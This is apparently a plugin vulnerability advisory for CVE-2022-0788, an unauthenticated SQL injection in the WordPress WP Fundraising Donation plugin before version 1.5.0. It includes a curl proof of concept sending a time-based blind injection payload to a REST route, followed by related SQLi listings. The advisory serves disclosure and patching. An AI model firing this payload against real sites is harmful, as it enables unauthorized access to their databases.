WP Fundraising Donation and Crowdfunding Platform < 1.5.0 – Unauthenticated SQLi | CVE 2022-0788 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via one of it's REST route, leading to an SQL injection exploitable by unauthenticated users

Proof of Concept

curl 'https://example.com/index.php?rest_route=/xs-donate-form/payment-redirect/3' \
    --data '{"id": "(SELECT 1 FROM (SELECT(SLEEP(5)))me)", "formid": "1", "type": "online_payment"}' \
    -X GET \
    -H 'Content-Type: application/json'

Affects Plugins

wp-fundraising-donation

Fixed in 1.5.0

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

fbc71710-123f-4c61-9796-a6a4fd354828

Timeline

Publicly Published

2022-05-11 (about 1 years ago)

Added

2022-05-11 (about 1 years ago)

Last Updated

2022-07-10 (about 1 years ago)

Other

Published

Title

Published

2016-02-02

Title

eShop - Authenticated Blind SQL Injection

Published

2022-08-30

Title

WP < 6.0.2 - SQLi via Link API

Published

2021-11-24

Title

Hide My WP < 6.2.4 - Unauthenticated SQLi

Published

2023-05-10

Title

AP Pricing Tables Lite <= 1.1.6 - Admin+ SQLi

Published

2021-12-21

Title

Asgaros Forum < 1.15.15 - Admin+ SQL Injection via forum_id